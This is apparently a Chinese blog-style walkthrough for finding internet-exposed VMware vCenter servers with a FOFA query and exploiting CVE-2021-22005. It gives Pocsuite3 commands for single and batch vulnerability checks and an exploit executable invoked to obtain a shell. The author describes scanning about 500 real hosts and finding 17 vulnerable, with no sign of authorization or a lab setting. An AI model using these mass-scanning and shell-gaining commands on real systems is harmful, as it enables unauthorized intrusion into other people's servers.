0x00 fofa

“VMware vCenter”

image.png

0x01 漏洞检测

下载PocSuite3

https://github.com/knownsec/pocsuite3/releases/tag/v1.8.5

执行以下命令

python cli.py -r pocs\20210923_WEB_Vmware_vCenter_Server_FIleUpload_CVE-2021-20050.py -u https://*.*.*.* —verify

image.png

0x02 批量检测

执行以下命令,注意1.txt放在和cli.py同个目录

pythoncli.py-rpocs\20210923_WEB_Vmware_vCenter_Server_FIleUpload_CVE-2021-20050.py-f 1.txt—verify

image.png
成功率很低,50个只有一个存在漏洞
image.png

0x03 参考

https://mp.weixin.qq.com/s/hORfGLg_11PDeoSx0N1XSQ

0x04 后续

上面那种方式没有exp,并且准确率很低
尝试使用其他exp,打开以下链接,exp在exp文件夹里

https://github.com/r0ckysec/CVE-2021-22005

执行以下命令获取shell

cve-2021-22005_exp_win.exe -u http://x.x.x.x:443/ —shell

image.png
image.png
image.png
image.png
以上在理想情况才能实现,现实是跑了500个里面有17个有漏洞,但是没法成功运行exp
image.png